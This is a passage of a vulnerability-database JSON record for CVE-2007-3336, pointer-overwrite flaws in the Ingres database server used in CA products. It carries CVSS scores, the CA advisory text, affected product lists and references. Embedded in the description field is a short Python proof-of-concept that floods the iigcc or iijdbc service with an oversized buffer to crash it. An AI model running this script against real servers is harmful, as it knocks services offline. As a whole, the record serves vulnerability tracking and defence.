    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:9.0.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:2.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:ingres:database_server:2.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "iDEFENSEChris Anley\u203b chris@ngssoftware.com",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2007-3336",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": true,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 10.0,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2007-3336",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2007-3336",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200706-389",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple \"pointer overwrite\" vulnerabilities in Ingres database server 2006 9.0.4, r3, 2.6, and 2.5, as used in multiple CA (formerly Computer Associates) products, allow remote attackers to execute arbitrary code by sending certain TCP data at different times to the Ingres Communications Server Process (iigcc), which calls the (1) QUinsert or (2) QUremove functions with attacker-controlled input. Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue. \nSuccessful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the \u0027alarkp.def\u0027 file. \nTitle: [CAID 35450, 35451, 35452, 35453]: CA Products That Embed \nIngres Multiple Vulnerabilities\n\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\n\nCA Advisory Date: 2007-06-21\n\nReported By: NGSSoftware, and iDefense\n\nImpact: Attackers can potentially execute arbitrary code, or \noverwrite files. CA has issued fixes, to address all of \nthese vulnerabilities, for all supported CA products that may be \naffected. \n\n3) Ingres wakeup file overwrite (reported by NGSSoftware) \n[Ingres bug 115913, CVE-2007-3337, CAID 35451]\nDescription: The \"wakeup\" binary creates a file named \n\"alarmwkp.def\" in the current directory, truncating the file if it \nalready exists. The \"wakeup\" binary is setuid \"ingres\" and \nworld-executable. Consequently, an attacker can truncate a file \nwith the privileges of the \"ingres\" user. \n\n4) Ingres uuid_from_char stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: An attacker can pass a long string as an argument to \nuuid_from_char() to cause a stack buffer overflow and the saved \nreturned address can be overwritten. \n\n5) Ingres verifydb local stack overflow (reported by NGSSoftware) \n[Ingres bug 115911, CVE-2007-3338, CAID 35452]\nDescription: A local attacker can exploit a stack overflow in the \nIngres verifydb utility duve_get_args function. \n\n6) Communication server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the communications server (iigcc.exe). This only \naffects Ingres on the Windows operating system. Reported by \niDefense as IDEF2023. \n\n7) Data Access/JDBC server heap corruption (reported by iDefense) \n[Ingres bug 117523, CVE-2007-3334, CAID 35453]\nDescription: An attacker can execute arbitrary code within the \ncontext of the Data Access server (iigcd.exe) in r3 or the JDCB \nserver in older releases. This only affects Ingres on the Windows \noperating system. Reported by iDefense as IDEF2022. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a cumulative High \nrisk rating. \n\nAffected Products:\nAdvantage Data Transformer r2.2\nAllFusion Enterprise Workbench r1.1, 1.1 SP1, r7, r7.1\nAllFusion Harvest Change Manager r7, r7.1\nBrightStor ARCserve Backup v9 (Linux only), r11.1, r11.5 (Unix, \n   Linux and Mainframe Linux)\nBrightStor ARCserve Backup for Laptops and Desktops r11.5\nBrightStor Enterprise Backup (Unix only) r10.5\nBrightStor Storage Command Center r11.5\nBrightStor Storage Resource Manager r11.5\nCleverPath Aion Business Rules Expert r10.1\nCleverPath Aion Business Process Monitoring r10.1\nCleverPath Predictive Analysis Server r3\nDocServer 1.1\neTrust Admin v8, v8.1, r8.1 SP1, r8.1 SP2\neTrust Audit r8 SP2\neTrust Directory r8.1\neTrust IAM Suite r8.0\neTrust IAM Toolkit r8.0, r8.1\neTrust Identity Manager r8.1\neTrust Network Forensics r8.1\neTrust Secure Content Manager r8\neTrust Single Sign-On r7, r8, r8.1\neTrust Web Access Control 1.0\nUnicenter Advanced Systems Management r11\nUnicenter Asset Intelligence r11\nUnicenter Asset Management r11\nUnicenter Asset Portfolio Management r11.2.1, r11.3\nUnicenter CCS r11\nUnicenter Database Command Center r11.1\nUnicenter Desktop and Server Management r11\nUnicenter Desktop Management Suite r11\nUnicenter Enterprise Job Manager r1 SP3, r1 SP4\nUnicenter Job Management Option r11\nUnicenter Lightweight Portal 2\nUnicenter Management Portal r3.1.1\nUnicenter Network and Systems Management r3.0, r11\nUnicenter Network and Systems Management - Tiered - Multi Platform \n   r3.0 0305, r3.1 0403, r11.0\nUnicenter Patch Management r11\nUnicenter Remote Control 6, r11\nUnicenter Service Accounting r11, r11.1\nUnicenter Service Assure r2.2, r11, r11.1\nUnicenter Service Catalog r11, r11.1\nUnicenter Service Delivery r11.0, r11.1\nUnicenter Service Intelligence r11\nUnicenter Service Metric Analysis r3.0.2, r3.5, r11, r11.1\nUnicenter ServicePlus Service Desk 5.5 SP3, 6.0, 6.0 SP1, r11, \n   r11.1, r11.2\nUnicenter Software Delivery r11\nUnicenter TNG 2.4, 2.4.2, 2.4.2J\nUnicenter Workload Control Center r1 SP3, r1 SP4\nUnicenter Web Services Distributed Management 3.11, 3.50\nWily SOA Manager 7.1\n\nAffected Platforms:\nAll operating system platforms supported by the various CA \nproducts that embed Ingres. This includes Windows, Linux, and \nsupported UNIX platforms. \n\nStatus and Recommendation:\nCA recommends that customers apply the appropriate fix(es) listed \non the Security Notice page: \nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for these vulnerabilities:\nIngres Security Alert\nhttp://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp\nImportant Security Notice for Customers Using Products That Embed \nIngres\nhttp://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp\nCA Security Advisor posting: \nCA Products That Embed Ingres Multiple Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778\nCA Vuln ID (CAID): 35450, 35451, 35452, 35453\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453\nIngres knowledge base document:\nhttp://servicedesk.ingres.com/CAisd/pdmweb.ingres?OP=SHOW_DETAIL+PERSID=KD:415738+HTMPL=kt_document_view.htmpl\nReported By: NGSSoftware, and iDefense\nNGSSoftware Advisory: \nhttp://www.ngssoftware.com/research/advisories/\niDefense Advisory: \nIngres Database Multiple Heap Corruption Vulnerabilities\nhttp://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546\nCVE References:\nCVE-2007-3336, CVE-2007-3337, CVE-2007-3338, CVE-2007-3334\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3336\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3337\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3338\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3334\nOSVDB References: Pending\nhttp://osvdb.org/\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. # Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities\n# Date: 2010-08-14\n# Author: fdisk\n# Version: 2.6\n# Tested on: Windows 2003 Server SP1 en\n# CVE:  CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338\n# Notes: Fixed in the last version. \n# please let me know if you are/were able to get code execution \u003crr dot fdisk at gmail dot com\u003e\n \nimport socket\nimport sys\n \nif len(sys.argv) != 4:\n    print \"Usage: ./CAAdvantageDoS.py \u003cTarget IP\u003e \u003cPort\u003e \u003cService\u003e\"\n    print \"Vulnerable Services: iigcc, iijdbc\"\n    sys.exit(1)\n \nhost = sys.argv[1]\nport = int(sys.argv[2])\nservice = sys.argv[3]\n \nif service == \"iigcc\":\n        payload = \"\\x41\" * 2106\nelif service == \"iijdbc\":\n        payload = \"\\x41\" * 1066\nelse:\n        print \"Vulnerable Services: iigcc, iijdbc\"\n        sys.exit(1)\n \npayload += \"\\x42\" * 4\n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((host, port))\nprint \"Sending payload\"\ns.send(payload)\ndata = s.recv(1024)\ns.close()\nprint \u0027Received\u0027, repr(data)\n \nprint service + \" crashed\"\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      }
    ],
    "trust": 2.07
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2007-3336",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "24585",
        "trust": 1.9
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2288",
        "trust": 1.6
      },
      {
        "db": "VUPEN",
        "id": "ADV-2007-2290",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25756",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "25775",
        "trust": 1.6
      },
      {
        "db": "OSVDB",
        "id": "37486",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027",
        "trust": 0.8
      },
      {
        "db": "BUGTRAQ",
        "id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 1",
        "trust": 0.6
      },
      {
        "db": "BUGTRAQ",
        "id": "20070625 INGRES UNAUTHENTICATED POINTER OVERWRITE 2",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "34993",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "35000",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "57303",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "92818",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "id": "VAR-200706-0397",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.12878788
  },
  "last_update_date": "2023-12-18T12:46:47.288000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Ingres Security Alert",
        "trust": 0.8,
        "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-DesignError",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778"
      },
      {
        "trust": 2.0,
        "url": "http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp"
      },
      {
        "trust": 1.9,
        "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/"
      },
      {
        "trust": 1.6,
        "url": "http://archives.neohapsis.com/archives/bugtraq/2007-06/0302.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25756"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/25775"
      },
      {
        "trust": 1.6,
        "url": "http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-1/"
      },
      {
        "trust": 1.6,
        "url": "http://www.securityfocus.com/bid/24585"
      },
      {
        "trust": 1.0,
        "url": "http://osvdb.org/37486"
      },
      {
        "trust": 1.0,
        "url": "http://www.securityfocus.com/archive/1/472193/100/0/threaded"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2288"
      },
      {
        "trust": 1.0,
        "url": "http://www.vupen.com/english/advisories/2007/2290"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34993"
      },
      {
        "trust": 1.0,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/35000"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3336"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-3336"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/35000"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/34993"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/archive/1/archive/1/472193/100/0/threaded"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2290"
      },
      {
        "trust": 0.6,
        "url": "http://www.frsirt.com/english/advisories/2007/2288"
      },
      {
        "trust": 0.4,
        "url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546"
      },
      {
        "trust": 0.3,
        "url": "http://www.ingres.com/"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472192"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/471950"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472197"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472193"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472194"
      },
      {
        "trust": 0.3,
        "url": "/archive/1/472200"
      },
      {
        "trust": 0.3,
        "url": "msg://bugtraq/649cdcb56c88aa458eff2cbf494b6204030a79ca@usilms12.ca.com"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3336"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3334"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3337"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3338"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3338"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnect.ca.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/contact/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3334"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3337"
      },
      {
        "trust": 0.1,
        "url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:415738+htmpl=kt_document_view.htmpl"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35452"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35451"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35453"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/privacy/"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnect.ca.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35450"
      },
      {
        "trust": 0.1,
        "url": "http://supportconnectw.ca.com/premium/ca_common_docs/ingres/ingres_secnotice.asp"
      },
      {
        "trust": 0.1,
        "url": "http://osvdb.org/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ngssoftware.com/research/advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://www.ca.com/us/legal/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2007-06-21T00:00:00",
        "db": "BID",
        "id": "24585"
      },
      {
        "date": "2012-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "date": "2007-06-26T21:32:27",
        "db": "PACKETSTORM",
        "id": "57303"
      },
      {
        "date": "2010-08-17T01:35:50",
        "db": "PACKETSTORM",
        "id": "92818"
      },
      {
        "date": "2007-06-22T18:30:00",
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "date": "2007-06-22T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2015-03-19T08:36:00",
        "db": "BID",
        "id": "24585"
      },
      {
        "date": "2012-09-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      },
      {
        "date": "2018-10-16T16:48:27.793000",
        "db": "NVD",
        "id": "CVE-2007-3336"
      },
      {
        "date": "2007-06-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "CA Used in products  Ingres database server Vulnerable to arbitrary code execution",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-004027"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Boundary Condition Error",
    "sources": [
      {
        "db": "BID",
        "id": "24585"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200706-389"
      }
    ],
    "trust": 0.9
  }
}

Tags

Taxonomy of the tags.

All sightings related to this event Export sightings related to this event

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2007-3336 (GCVE-0-2007-3336)

GHSA-Q782-HGFX-W6CC

GSD-2007-3336

FKIE_CVE-2007-3336

CERTA-2007-AVI-275

Description

Solution

CERTA-2007-AVI-275

Description

Solution

VAR-200706-0397

Date: 2010-08-14

Author: fdisk

Version: 2.6

Tested on: Windows 2003 Server SP1 en

CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338

Notes: Fixed in the last version.

please let me know if you are/were able to get code execution

Tags

Sightings

Nomenclature